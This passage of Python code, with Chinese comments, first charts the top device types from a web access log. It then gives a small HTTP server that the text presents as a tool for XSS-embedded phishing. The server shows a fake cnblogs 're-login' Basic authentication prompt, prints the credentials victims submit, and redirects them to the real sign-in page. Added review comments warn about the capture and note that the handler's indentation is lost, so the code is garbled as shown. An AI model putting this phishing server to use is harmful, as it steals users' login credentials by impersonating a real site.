    x = [name for name, _ in top]
    y = [count for _, count in top]
    plt.rcParams["font.sans-serif"] = ["KaiTi"]
    plt.title("訪問設備類型前10")
    plt.xticks(rotation=70)
    for a,b in zip(x,y):
        # Write each count above its bar.
        plt.text(a, b, '%.0f' % b, ha='center', va= 'bottom',fontsize=7)
    plt.bar(x,y)
    plt.legend()
    plt.show()
# Example run over the sample log and date range.
Count_Equipment(log_name="c://access_log", start_time="2020-03-11", end_time="2020-03-17")

構建簡易HTTPBasic認證: Basic認證是由web服務器提供的一種輕便的身份校驗方式,此處實現的工具可用於XSS內嵌釣魚.
import socketserver
import http.server
# GET handler with three outcomes, chosen by searching the request headers as text:
#   - headers contain "UserLogin=1": redirect (302) to the sign-in URL
#   - headers contain "Authorization: Basic ": set the UserLogin cookie, redirect,
#     and print the complete request headers to stdout
#   - otherwise: answer 401 with a WWW-Authenticate challenge
# NOTE(review): this handler prints submitted Authorization headers; run it only
# in an environment where that is explicitly authorised.
# NOTE(review): indentation was lost in this copy, so it cannot be told from here
# which branches the final end_headers() call belongs to - confirm against the
# original file.
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# find() > 0: a match at position 0 of the header text would not count.
if str(self.headers).find('UserLogin=1') > 0:
self.send_response(302)
self.send_header('Location', 'https://account.cnblogs.com/signin')
self.end_headers()
else:
if str(self.headers).find('Authorization: Basic ') > 0:
self.send_response(302)
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location', 'https://account.cnblogs.com/signin')
print("------------------------------------------------------------")
print(str(self.headers))
else:
self.send_response(401)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.send_header('WWW-Authenticate',
'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
self.end_headers()
# Listen on all interfaces, TCP port 9999, and serve requests until the process is stopped.
httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()

